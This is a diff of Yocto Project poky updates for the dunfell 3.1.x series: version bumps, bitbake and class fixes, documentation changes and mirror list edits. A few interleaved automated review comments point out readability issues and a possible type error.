+++ b/poky/bitbake/lib/bblayers/query.py @@ -150,7 +150,7 @@ skipped recipes will also be listed, with a " (skipped)" suffix. def print_item(f, pn, ver, layer, ispref): if not selected_layer or layer == selected_layer: if not bare and f in skiplist: - skipped = ' (skipped)' + skipped = ' (skipped: %s)' % self.tinfoil.cooker.skiplist[f].skipreason else: skipped = '' if show_filenames: @@ -433,10 +433,10 @@ NOTE: .bbappend files can impact the dependencies. line = fnfile.readline() # The "require/include xxx" in conf/machine/*.conf, .inc and .bbclass - conf_re = re.compile(".*/conf/machine/[^\/]*\.conf$") - inc_re = re.compile(".*\.inc$") + conf_re = re.compile(r".*/conf/machine/[^\/]*\.conf$") + inc_re = re.compile(r".*\.inc$") # The "inherit xxx" in .bbclass - bbclass_re = re.compile(".*\.bbclass$") + bbclass_re = re.compile(r".*\.bbclass$") for layerdir in self.bblayers: layername = self.get_layer_name(layerdir) for dirpath, dirnames, filenames in os.walk(layerdir): diff --git a/poky/bitbake/lib/hashserv/server.py b/poky/bitbake/lib/hashserv/server.py index 81050715ea..f38a22ad92 100644 --- a/poky/bitbake/lib/hashserv/server.py +++ b/poky/bitbake/lib/hashserv/server.py @@ -12,6 +12,7 @@ import math import os import signal import socket +import sys import time from . import chunkify, DEFAULT_MAX_CHUNK @@ -419,9 +420,14 @@ class Server(object): self._cleanup_socket = None def start_tcp_server(self, host, port): - self.server = self.loop.run_until_complete( - asyncio.start_server(self.handle_client, host, port, loop=self.loop) - ) + if sys.version_info[0] == 3 and sys.version_info[1] < 6: + self.server = self.loop.run_until_complete( + asyncio.start_server(self.handle_client, host, port, loop=self.loop) + ) + else: + self.server = self.loop.run_until_complete( + asyncio.start_server(self.handle_client, host, port) + ) for s in self.server.sockets: logger.info('Listening on %r' % (s.getsockname(),)) 
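Review bot: The version test `sys.version_info[0] == 3 and sys.version_info[1] < 6` in `start_tcp_server` is harder to read than the tuple comparison `sys.version_info < (3, 6)`, and the whole branch is repeated verbatim in the `start_unix_server` hunk that follows. Neither copy says why the split exists; a one-line comment such as `# the loop= argument is deprecated since Python 3.8 and removed in 3.10` would record it. Building the keyword arguments once, with `loop=self.loop` included only on the old interpreters, would let both methods share a single `run_until_complete` call each.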
@@ -444,9 +450,14 @@ class Server(object): try: # Work around path length limits in AF_UNIX os.chdir(os.path.dirname(path)) - self.server = self.loop.run_until_complete( - asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) - ) + if sys.version_info[0] == 3 and sys.version_info[1] < 6: + self.server = self.loop.run_until_complete( + asyncio.start_unix_server(self.handle_client, os.path.basename(path), loop=self.loop) + ) + else: + self.server = self.loop.run_until_complete( + asyncio.start_unix_server(self.handle_client, os.path.basename(path)) + ) finally: os.chdir(cwd) diff --git a/poky/bitbake/lib/layerindexlib/__init__.py b/poky/bitbake/lib/layerindexlib/__init__.py index 77196b408f..f30ee9e259 100644 --- a/poky/bitbake/lib/layerindexlib/__init__.py +++ b/poky/bitbake/lib/layerindexlib/__init__.py @@ -6,7 +6,6 @@ import datetime import logging -import imp from collections import OrderedDict from layerindexlib.plugin import LayerIndexPluginUrlError diff --git a/poky/documentation/conf.py b/poky/documentation/conf.py index 82fa325545..0d61afc9da 100644 --- a/poky/documentation/conf.py +++ b/poky/documentation/conf.py @@ -16,7 +16,8 @@ import os import sys import datetime -current_version = "3.1.10" +current_version = "3.1.13" +bitbake_version = "1.46" # String used in sidebar version = 'Version: ' + current_version @@ -82,7 +83,7 @@ extlinks = { # Intersphinx config to use cross reference with Bitbake user manual intersphinx_mapping = { - 'bitbake': ('https://docs.yoctoproject.org/bitbake/1.46', None) + 'bitbake': ('https://docs.yoctoproject.org/bitbake/' + bitbake_version, None) } # -- Options for HTML output ------------------------------------------------- diff --git a/poky/documentation/poky.yaml b/poky/documentation/poky.yaml index 590af46ebd..8da5f5915d 100644 --- a/poky/documentation/poky.yaml +++ b/poky/documentation/poky.yaml 
@@ -1,11 +1,11 @@ -DISTRO : "3.1.10" +DISTRO : "3.1.13" DISTRO_NAME_NO_CAP : "dunfell" DISTRO_NAME : "Dunfell" DISTRO_NAME_NO_CAP_MINUS_ONE : "zeus" -YOCTO_DOC_VERSION : "3.1.10" -YOCTO_DOC_VERSION_MINUS_ONE : "3.0.2" -DISTRO_REL_TAG : "yocto-3.1.10" -POKYVERSION : "23.0.10" +YOCTO_DOC_VERSION : "3.1.13" +YOCTO_DOC_VERSION_MINUS_ONE : "3.0.4" +DISTRO_REL_TAG : "yocto-3.1.13" +POKYVERSION : "23.0.13" YOCTO_POKY : "poky-&DISTRO_NAME_NO_CAP;-&POKYVERSION;" YOCTO_DL_URL : "https://downloads.yoctoproject.org" YOCTO_AB_URL : "https://autobuilder.yoctoproject.org" @@ -18,7 +18,8 @@ FEDORA_HOST_PACKAGES_ESSENTIAL : "gawk make wget tar bzip2 gzip python3 unzip pe diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \ ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue perl-bignum socat \ python3-pexpect findutils which file cpio python python3-pip xz python3-GitPython \ - python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel" + python3-jinja2 SDL-devel xterm rpcgen mesa-libGL-devel perl-FindBin perl-File-Compare \ + perl-File-Copy perl-locale" OPENSUSE_HOST_PACKAGES_ESSENTIAL : "python gcc gcc-c++ git chrpath make wget python-xml \ diffstat makeinfo python-curses patch socat python3 python3-curses tar python3-pip \ python3-pexpect xz which python3-Jinja2 Mesa-libEGL1 libSDL-devel xterm rpcgen Mesa-dri-devel diff --git a/poky/documentation/ref-manual/migration-3.0.rst b/poky/documentation/ref-manual/migration-3.0.rst index 047b75526f..50f7d697b0 100644 --- a/poky/documentation/ref-manual/migration-3.0.rst +++ b/poky/documentation/ref-manual/migration-3.0.rst @@ -184,8 +184,7 @@ The following BitBake changes have occurred. exceptions. Remove this argument in any calls to ``bb.build.exec_func()`` in custom classes or scripts. -- The - :term:`bitbake:BB_SETSCENE_VERIFY_FUNCTION2` +- The ``BB_SETSCENE_VERIFY_FUNCTION2`` variable is no longer used. In the unlikely event that you have any references to it, they should be removed. 
diff --git a/poky/documentation/ref-manual/ref-system-requirements.rst b/poky/documentation/ref-manual/ref-system-requirements.rst index d238dc454b..041f64c598 100644 --- a/poky/documentation/ref-manual/ref-system-requirements.rst +++ b/poky/documentation/ref-manual/ref-system-requirements.rst @@ -57,6 +57,8 @@ distributions: - Fedora 33 +- Fedora 34 + - CentOS 7.x - Debian GNU/Linux 8.x (Jessie) @@ -65,6 +67,8 @@ distributions: - Debian GNU/Linux 10.x (Buster) +- Debian GNU/Linux 11.x (Bullseye) + - OpenSUSE Leap 15.1 - OpenSUSE Leap 15.2 diff --git a/poky/documentation/ref-manual/ref-tasks.rst b/poky/documentation/ref-manual/ref-tasks.rst index 4ed15365f3..2f1959a010 100644 --- a/poky/documentation/ref-manual/ref-tasks.rst +++ b/poky/documentation/ref-manual/ref-tasks.rst @@ -331,22 +331,19 @@ file as a patch file: file://file;apply=yes \ " -Conversely, if you have a directory full of patch files and you want to -exclude some so that the ``do_patch`` task does not apply them during -the patch phase, you can use the "apply=no" parameter with the -``SRC_URI`` statement: -:: +Conversely, if you have a file whose file type is ``.patch`` or ``.diff`` +and you want to exclude it so that the ``do_patch`` task does not apply +it during the patch phase, you can use the "apply=no" parameter with the +:term:`SRC_URI` statement:: SRC_URI = " \ git://path_to_repo/some_package \ - file://path_to_lots_of_patch_files \ - file://path_to_lots_of_patch_files/patch_file5;apply=no \ + file://file1.patch \ + file://file2.patch;apply=no \ " -In the -previous example, assuming all the files in the directory holding the -patch files end with either ``.patch`` or ``.diff``, every file would be -applied as a patch by default except for the ``patch_file5`` patch. +In the previous example ``file1.patch`` would be applied as a patch by default +while ``file2.patch`` would not be applied. You can find out more about the patching process in the ":ref:`patching-dev-environment`" section in 
diff --git a/poky/documentation/releases.rst b/poky/documentation/releases.rst index 78f604e2a1..57e4566e1b 100644 --- a/poky/documentation/releases.rst +++ b/poky/documentation/releases.rst @@ -1,11 +1,28 @@ .. SPDX-License-Identifier: CC-BY-SA-2.0-UK -========================= - Current Release Manuals -========================= +=========================== + Supported Release Manuals +=========================== + +****************************** +Release Series 3.4 (honister) +****************************** + +- :yocto_docs:`3.4 Documentation </3.4>` +- :yocto_docs:`3.4.1 Documentation </3.4.1>` + +****************************** +Release Series 3.3 (hardknott) +****************************** + +- :yocto_docs:`3.3 Documentation </3.3>` +- :yocto_docs:`3.3.1 Documentation </3.3.1>` +- :yocto_docs:`3.3.2 Documentation </3.3.2>` +- :yocto_docs:`3.3.3 Documentation </3.3.3>` +- :yocto_docs:`3.3.4 Documentation </3.3.4>` **************************** -3.1 'dunfell' Release Series +Release Series 3.1 (dunfell) **************************** - :yocto_docs:`3.1 Documentation </3.1>` @@ -19,13 +36,26 @@ - :yocto_docs:`3.1.8 Documentation </3.1.8>` - :yocto_docs:`3.1.9 Documentation </3.1.9>` - :yocto_docs:`3.1.10 Documentation </3.1.10>` +- :yocto_docs:`3.1.11 Documentation </3.1.11>` +- :yocto_docs:`3.1.12 Documentation </3.1.12>` +- :yocto_docs:`3.1.13 Documentation </3.1.13>` ========================== - Previous Release Manuals + Outdated Release Manuals ========================== +******************************* +Release Series 3.2 (gatesgarth) +******************************* + +- :yocto_docs:`3.2 Documentation </3.2>` +- :yocto_docs:`3.2.1 Documentation </3.2.1>` +- :yocto_docs:`3.2.2 Documentation </3.2.2>` +- :yocto_docs:`3.2.3 Documentation </3.2.3>` +- :yocto_docs:`3.2.4 Documentation </3.2.4>` + ************************* -3.0 'zeus' Release Series +Release Series 3.0 (zeus) ************************* - :yocto_docs:`3.0 Documentation </3.0>` 
@@ -35,7 +65,7 @@ - :yocto_docs:`3.0.4 Documentation </3.0.4>` **************************** -2.7 'warrior' Release Series +Release Series 2.7 (warrior) **************************** - :yocto_docs:`2.7 Documentation </2.7>` @@ -45,7 +75,7 @@ - :yocto_docs:`2.7.4 Documentation </2.7.4>` ************************* -2.6 'thud' Release Series +Release Series 2.6 (thud) ************************* - :yocto_docs:`2.6 Documentation </2.6>` @@ -55,16 +85,16 @@ - :yocto_docs:`2.6.4 Documentation </2.6.4>` ************************* -2.5 'sumo' Release Series +Release Series 2.5 (sumo) ************************* - :yocto_docs:`2.5 Documentation </2.5>` - :yocto_docs:`2.5.1 Documentation </2.5.1>` - :yocto_docs:`2.5.2 Documentation </2.5.2>` - :yocto_docs:`2.5.3 Documentation </2.5.3>` - + ************************** -2.4 'rocko' Release Series +Release Series 2.4 (rocko) ************************** - :yocto_docs:`2.4 Documentation </2.4>` @@ -74,7 +104,7 @@ - :yocto_docs:`2.4.4 Documentation </2.4.4>` ************************* -2.3 'pyro' Release Series +Release Series 2.3 (pyro) ************************* - :yocto_docs:`2.3 Documentation </2.3>` @@ -84,7 +114,7 @@ - :yocto_docs:`2.3.4 Documentation </2.3.4>` ************************** -2.2 'morty' Release Series +Release Series 2.2 (morty) ************************** - :yocto_docs:`2.2 Documentation </2.2>` @@ -93,7 +123,7 @@ - :yocto_docs:`2.2.3 Documentation </2.2.3>` **************************** -2.1 'krogoth' Release Series +Release Series 2.1 (krogoth) **************************** - :yocto_docs:`2.1 Documentation </2.1>` @@ -102,7 +132,7 @@ - :yocto_docs:`2.1.3 Documentation </2.1.3>` *************************** -2.0 'jethro' Release Series +Release Series 2.0 (jethro) *************************** - :yocto_docs:`1.9 Documentation </1.9>` 
@@ -112,7 +142,7 @@ - :yocto_docs:`2.0.3 Documentation </2.0.3>` ************************* -1.8 'fido' Release Series +Release Series 1.8 (fido) ************************* - :yocto_docs:`1.8 Documentation </1.8>` @@ -120,7 +150,7 @@ - :yocto_docs:`1.8.2 Documentation </1.8.2>` ************************** -1.7 'dizzy' Release Series +Release Series 1.7 (dizzy) ************************** - :yocto_docs:`1.7 Documentation </1.7>` @@ -129,16 +159,16 @@ - :yocto_docs:`1.7.3 Documentation </1.7.3>` ************************** -1.6 'daisy' Release Series +Release Series 1.6 (daisy) ************************** - :yocto_docs:`1.6 Documentation </1.6>` - :yocto_docs:`1.6.1 Documentation </1.6.1>` - :yocto_docs:`1.6.2 Documentation </1.6.2>` - :yocto_docs:`1.6.3 Documentation </1.6.3>` - + ************************* -1.5 'dora' Release Series +Release Series 1.5 (dora) ************************* - :yocto_docs:`1.5 Documentation </1.5>` @@ -148,7 +178,7 @@ - :yocto_docs:`1.5.4 Documentation </1.5.4>` ************************** -1.4 'dylan' Release Series +Release Series 1.4 (dylan) ************************** - :yocto_docs:`1.4 Documentation </1.4>` @@ -157,9 +187,9 @@ - :yocto_docs:`1.4.3 Documentation </1.4.3>` - :yocto_docs:`1.4.4 Documentation </1.4.4>` - :yocto_docs:`1.4.5 Documentation </1.4.5>` - + ************************** -1.3 'danny' Release Series +Release Series 1.3 (danny) ************************** - :yocto_docs:`1.3 Documentation </1.3>` @@ -167,7 +197,7 @@ - :yocto_docs:`1.3.2 Documentation </1.3.2>` *************************** -1.2 'denzil' Release Series +Release Series 1.2 (denzil) *************************** - :yocto_docs:`1.2 Documentation </1.2>` @@ -175,7 +205,7 @@ - :yocto_docs:`1.2.2 Documentation </1.2.2>` *************************** -1.1 'edison' Release Series +Release Series 1.1 (edison) *************************** - :yocto_docs:`1.1 Documentation </1.1>` 
@@ -183,7 +213,7 @@ - :yocto_docs:`1.1.2 Documentation </1.1.2>` **************************** -1.0 'bernard' Release Series +Release Series 1.0 (bernard) **************************** - :yocto_docs:`1.0 Documentation </1.0>` @@ -191,7 +221,7 @@ - :yocto_docs:`1.0.2 Documentation </1.0.2>` **************************** -0.9 'laverne' Release Series +Release Series 0.9 (laverne) **************************** - :yocto_docs:`0.9 Documentation </0.9>` diff --git a/poky/documentation/sphinx-static/switchers.js b/poky/documentation/sphinx-static/switchers.js index a6432ae9b0..bda15485c0 100644 --- a/poky/documentation/sphinx-static/switchers.js +++ b/poky/documentation/sphinx-static/switchers.js @@ -2,8 +2,11 @@ 'use strict'; var all_versions = { - 'dev': 'dev (3.3)', - '3.1.10': '3.1.10', + 'dev': 'dev (3.5)', + '3.4.1': '3.4.1', + '3.3.4': '3.3.4', + '3.2.4': '3.2.4', + '3.1.13': '3.1.13', '3.0.4': '3.0.4', '2.7.4': '2.7.4', }; diff --git a/poky/meta-poky/conf/distro/poky.conf b/poky/meta-poky/conf/distro/poky.conf index 11897c7422..7274657037 100644 --- a/poky/meta-poky/conf/distro/poky.conf +++ b/poky/meta-poky/conf/distro/poky.conf @@ -1,6 +1,6 @@ DISTRO = "poky" DISTRO_NAME = "Poky (Yocto Project Reference Distro)" -DISTRO_VERSION = "3.1.10" +DISTRO_VERSION = "3.1.14" DISTRO_CODENAME = "dunfell" SDK_VENDOR = "-pokysdk" SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}" @@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}" PREFERRED_VERSION_linux-yocto ?= "5.4%" SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}" -SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}" +SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}" DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}" DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}" 
@@ -61,11 +61,13 @@ SANITY_TESTED_DISTROS ?= " \ fedora-31 \n \ fedora-32 \n \ fedora-33 \n \ + fedora-34 \n \ centos-7 \n \ centos-8 \n \ debian-8 \n \ debian-9 \n \ debian-10 \n \ + debian-11 \n \ opensuseleap-15.1 \n \ opensuseleap-15.2 \n \ " diff --git a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb index 07b83276fb..8a27e3a791 100644 --- a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb +++ b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb @@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717" PV = "0.1+git${SRCPV}" PR = "r2" -SRC_URI = "git://git.yoctoproject.org/dbus-wait" +SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master" UPSTREAM_CHECK_COMMITS = "1" RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" diff --git a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded index 32ec4b14fa..fbe90d6c6b 100644 --- a/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded +++ b/poky/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded @@ -10,7 +10,7 @@ DEPENDS = "dbus" SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" PV = "0.1+git${SRCPV}" -SRC_URI = "git://git.yoctoproject.org/dbus-wait" +SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master" UPSTREAM_CHECK_COMMITS = "1" RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" diff --git a/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend index 35147d2da8..cd059c06c4 100644 --- a/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend +++ b/poky/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend 
@@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc" KMACHINE_genericx86-64 ?= "common-pc-64" KMACHINE_beaglebone-yocto ?= "beaglebone" -SRCREV_machine_genericx86 ?= "31db2b47ac7d8508080fbb7344399b501216de66" -SRCREV_machine_genericx86-64 ?= "31db2b47ac7d8508080fbb7344399b501216de66" +SRCREV_machine_genericx86 ?= "76404f1ae59698b6a446dba29c885ca78c69c330" +SRCREV_machine_genericx86-64 ?= "76404f1ae59698b6a446dba29c885ca78c69c330" SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" @@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64" COMPATIBLE_MACHINE_edgerouter = "edgerouter" COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto" -LINUX_VERSION_genericx86 = "5.4.94" -LINUX_VERSION_genericx86-64 = "5.4.94" +LINUX_VERSION_genericx86 = "5.4.158" +LINUX_VERSION_genericx86-64 = "5.4.158" LINUX_VERSION_edgerouter = "5.4.58" LINUX_VERSION_beaglebone-yocto = "5.4.58" diff --git a/poky/meta/classes/base.bbclass b/poky/meta/classes/base.bbclass index 8a1b5f79c1..9ed736b0e1 100644 --- a/poky/meta/classes/base.bbclass +++ b/poky/meta/classes/base.bbclass @@ -153,14 +153,14 @@ do_fetch[vardeps] += "SRCREV" python base_do_fetch() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: fetcher = bb.fetch2.Fetch(src_uri, d) fetcher.download() except bb.fetch2.BBFetchException as e: - bb.fatal(str(e)) + bb.fatal("Bitbake Fetcher Error: " + repr(e)) } addtask unpack after do_fetch @@ -170,14 +170,14 @@ do_unpack[cleandirs] = "${@d.getVar('S') if os.path.normpath(d.getVar('S')) != o python base_do_unpack() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: fetcher = bb.fetch2.Fetch(src_uri, d) fetcher.unpack(d.getVar('WORKDIR')) except bb.fetch2.BBFetchException as e: - bb.fatal(str(e)) + bb.fatal("Bitbake Fetcher Error: " + repr(e)) } def get_layers_branch_rev(d): 
@@ -688,7 +688,7 @@ python () { if os.path.basename(p) == machine and os.path.isdir(p): paths.append(p) - if len(paths) != 0: + if paths: for s in srcuri.split(): if not s.startswith("file://"): continue @@ -721,7 +721,7 @@ do_cleansstate[nostamp] = "1" python do_cleanall() { src_uri = (d.getVar('SRC_URI') or "").split() - if len(src_uri) == 0: + if not src_uri: return try: diff --git a/poky/meta/classes/buildhistory.bbclass b/poky/meta/classes/buildhistory.bbclass index 44a66df962..2746996cbb 100644 --- a/poky/meta/classes/buildhistory.bbclass +++ b/poky/meta/classes/buildhistory.bbclass 
@@ -953,23 +953,19 @@ def write_latest_srcrev(d, pkghistdir): value = value.replace('"', '').strip() old_tag_srcrevs[key] = value with open(srcrevfile, 'w') as f: - orig_srcrev = d.getVar('SRCREV', False) or 'INVALID' - if orig_srcrev != 'INVALID': - f.write('# SRCREV = "%s"\n' % orig_srcrev) - if len(srcrevs) > 1: - for name, srcrev in sorted(srcrevs.items()): - orig_srcrev = d.getVar('SRCREV_%s' % name, False) - if orig_srcrev: - f.write('# SRCREV_%s = "%s"\n' % (name, orig_srcrev)) - f.write('SRCREV_%s = "%s"\n' % (name, srcrev)) - else: - f.write('SRCREV = "%s"\n' % next(iter(srcrevs.values()))) - if len(tag_srcrevs) > 0: - for name, srcrev in sorted(tag_srcrevs.items()): - f.write('# tag_%s = "%s"\n' % (name, srcrev)) - if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev: - pkg = d.getVar('PN') - bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev)) + for name, srcrev in sorted(srcrevs.items()): + suffix = "_" + name + if name == "default": + suffix = "" + orig_srcrev = d.getVar('SRCREV%s' % suffix, False) + if orig_srcrev: + f.write('# SRCREV%s = "%s"\n' % (suffix, orig_srcrev)) + f.write('SRCREV%s = "%s"\n' % (suffix, srcrev)) + for name, srcrev in sorted(tag_srcrevs.items()): + f.write('# tag_%s = "%s"\n' % (name, srcrev)) + if name in old_tag_srcrevs and old_tag_srcrevs[name] != srcrev: + pkg = d.getVar('PN') + bb.warn("Revision for tag %s in package %s was changed since last build (from %s to %s)" % (name, pkg, old_tag_srcrevs[name], srcrev)) else: if os.path.exists(srcrevfile): diff --git a/poky/meta/classes/cve-check.bbclass b/poky/meta/classes/cve-check.bbclass index b6df2c31da..6eecbdbf13 100644 --- a/poky/meta/classes/cve-check.bbclass +++ b/poky/meta/classes/cve-check.bbclass 
@@ -110,7 +110,8 @@ python do_cve_check () { } addtask cve_check before do_build after do_fetch -do_cve_check[depends] = "cve-update-db-native:do_populate_cve_db" +do_cve_check[lockfiles] += "${CVE_CHECK_DB_FILE_LOCK}" +do_cve_check[depends] = "cve-update-db-native:do_fetch" do_cve_check[nostamp] = "1" python cve_check_cleanup () { diff --git a/poky/meta/classes/devtool-source.bbclass b/poky/meta/classes/devtool-source.bbclass index 280d6009f3..41900e651f 100644 --- a/poky/meta/classes/devtool-source.bbclass +++ b/poky/meta/classes/devtool-source.bbclass @@ -199,6 +199,7 @@ python devtool_post_patch() { # Run do_patch function with the override applied localdata = bb.data.createCopy(d) localdata.setVar('OVERRIDES', ':'.join(no_overrides)) + localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides)) bb.build.exec_func('do_patch', localdata) rm_patches() # Now we need to reconcile the dev branch with the no-overrides one @@ -216,7 +217,8 @@ python devtool_post_patch() { # Reset back to the initial commit on a new branch bb.process.run('git checkout %s -b devtool-override-%s' % (initial_rev, override), cwd=srcsubdir) # Run do_patch function with the override applied - localdata.appendVar('OVERRIDES', ':%s' % override) + localdata.setVar('OVERRIDES', ':'.join(no_overrides + [override])) + localdata.setVar('FILESOVERRIDES', ':'.join(no_overrides + [override])) bb.build.exec_func('do_patch', localdata) rm_patches() # Now we need to reconcile the new branch with the no-overrides one diff --git a/poky/meta/classes/devupstream.bbclass b/poky/meta/classes/devupstream.bbclass index 7780c5482c..97e137cb40 100644 --- a/poky/meta/classes/devupstream.bbclass +++ b/poky/meta/classes/devupstream.bbclass 
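Review bot: The two changed `do_cve_check` flags in cve-check.bbclass carry no comment saying why the task now takes `${CVE_CHECK_DB_FILE_LOCK}` and depends on `cve-update-db-native:do_fetch` instead of `do_populate_cve_db`. Presumably the database is now refreshed in that recipe's do_fetch and the lock keeps a check from reading a database that is still being written. If so, state it above the flags, e.g. `# Hold the DB lock so the check never reads a database that cve-update-db-native is still updating`. The lock is held for the whole task, so it is worth confirming that it does not serialise every recipe's do_cve_check more than intended.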
@@ -4,7 +4,7 @@ # # Usage: # BBCLASSEXTEND = "devupstream:target" -# SRC_URI_class-devupstream = "git://git.example.com/example" +# SRC_URI_class-devupstream = "git://git.example.com/example;branch=master" # SRCREV_class-devupstream = "abcdef" # # If the first entry in SRC_URI is a git: URL then S is rewritten to diff --git a/poky/meta/classes/externalsrc.bbclass b/poky/meta/classes/externalsrc.bbclass index c7fcdca6ef..0e0a3ae89c 100644 --- a/poky/meta/classes/externalsrc.bbclass +++ b/poky/meta/classes/externalsrc.bbclass @@ -108,6 +108,15 @@ python () { if local_srcuri and task in fetch_tasks: continue bb.build.deltask(task, d) + if bb.data.inherits_class('reproducible_build', d) and task == 'do_unpack': + # The reproducible_build's create_source_date_epoch_stamp function must + # be run after the source is available and before the + # do_deploy_source_date_epoch task. In the normal case, it's attached + # to do_unpack as a postfuncs, but since we removed do_unpack (above) + # we need to move the function elsewhere. The easiest thing to do is + # move it into the prefuncs of the do_deploy_source_date_epoch task. + # This is safe, as externalsrc runs with the source already unpacked. + d.prependVarFlag('do_deploy_source_date_epoch', 'prefuncs', 'create_source_date_epoch_stamp ') d.prependVarFlag('do_compile', 'prefuncs', "externalsrc_compile_prefunc ") d.prependVarFlag('do_configure', 'prefuncs', "externalsrc_configure_prefunc ") diff --git a/poky/meta/classes/image_types.bbclass b/poky/meta/classes/image_types.bbclass index ff42ac9423..6dc0e094d0 100644 --- a/poky/meta/classes/image_types.bbclass +++ b/poky/meta/classes/image_types.bbclass 
@@ -240,7 +240,7 @@ EXTRA_IMAGECMD_jffs2 ?= "--pad ${JFFS2_ENDIANNESS} --eraseblock=${JFFS2_ERASEBLO EXTRA_IMAGECMD_ext2 ?= "-i 4096" EXTRA_IMAGECMD_ext3 ?= "-i 4096" EXTRA_IMAGECMD_ext4 ?= "-i 4096" -EXTRA_IMAGECMD_btrfs ?= "-n 4096" +EXTRA_IMAGECMD_btrfs ?= "-n 4096 --shrink" EXTRA_IMAGECMD_f2fs ?= "" do_image_cpio[depends] += "cpio-native:do_populate_sysroot" diff --git a/poky/meta/classes/libc-package.bbclass b/poky/meta/classes/libc-package.bbclass index de3b4250c7..1143f538d6 100644 --- a/poky/meta/classes/libc-package.bbclass +++ b/poky/meta/classes/libc-package.bbclass @@ -355,7 +355,7 @@ python package_do_split_gconvs () { m.write("\t@echo 'Progress %d/%d'\n" % (i, total)) m.write("\t" + makerecipe + "\n\n") d.setVar("EXTRA_OEMAKE", "-C %s ${PARALLEL_MAKE}" % (os.path.dirname(makefile))) - d.setVarFlag("oe_runmake", "progress", "outof:Progress\s(\d+)/(\d+)") + d.setVarFlag("oe_runmake", "progress", r"outof:Progress\s(\d+)/(\d+)") bb.note("Executing binary locale generation makefile") bb.build.exec_func("oe_runmake", d) bb.note("collecting binary locales from locale tree") diff --git a/poky/meta/classes/license.bbclass b/poky/meta/classes/license.bbclass index 73f99e87a8..6b03221c7f 100644 --- a/poky/meta/classes/license.bbclass +++ b/poky/meta/classes/license.bbclass @@ -153,6 +153,10 @@ def find_license_files(d): find_license(node.s.replace("+", "").replace("*", "")) self.generic_visit(node) + def visit_Constant(self, node): + find_license(node.value.replace("+", "").replace("*", "")) + self.generic_visit(node) + def find_license(license_type): try: bb.utils.mkdirhier(gen_lic_dest) diff --git a/poky/meta/classes/mirrors.bbclass b/poky/meta/classes/mirrors.bbclass index 87bba41472..a36236df9f 100644 --- a/poky/meta/classes/mirrors.bbclass +++ b/poky/meta/classes/mirrors.bbclass 
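Review bot: `visit_Constant` in license.bbclass calls `node.value.replace(...)` without checking the type, and `ast.Constant` also covers numbers and `None`, so a non-string constant in the parsed expression would raise AttributeError instead of being skipped. A guard such as `if isinstance(node.value, str):` before the `find_license(...)` call keeps it equivalent to the existing method just above it that reads `node.s`. The enclosing visitor class and `find_license_files` start outside the hunk, so whether a non-string constant can actually reach this method is not visible here.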
@@ -29,7 +29,6 @@ ftp://dante.ctan.org/tex-archive ftp://ftp.fu-berlin.de/tex/CTAN \n \ ftp://dante.ctan.org/tex-archive http://sunsite.sut.ac.jp/pub/archives/ctan/ \n \ ftp://dante.ctan.org/tex-archive http://ctan.unsw.edu.au/ \n \ ftp://ftp.gnutls.org/gcrypt/gnutls ${GNUPG_MIRROR}/gnutls \n \ -http://ftp.info-zip.org/pub/infozip/src/ http://mirror.switch.ch/ftp/mirror/infozip/src/ \n \ http://ftp.info-zip.org/pub/infozip/src/ ftp://sunsite.icm.edu.pl/pub/unix/archiving/info-zip/src/ \n \ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/ http://www.mirrorservice.org/sites/lsof.itap.purdue.edu/pub/tools/unix/lsof/OLD/ \n \ ${APACHE_MIRROR} http://www.us.apache.org/dist \n \ @@ -62,6 +61,8 @@ ftp://.*/.* http://sources.openembedded.org/ \n \ npm://.*/?.* http://sources.openembedded.org/ \n \ ${CPAN_MIRROR} http://cpan.metacpan.org/ \n \ ${CPAN_MIRROR} http://search.cpan.org/CPAN/ \n \ 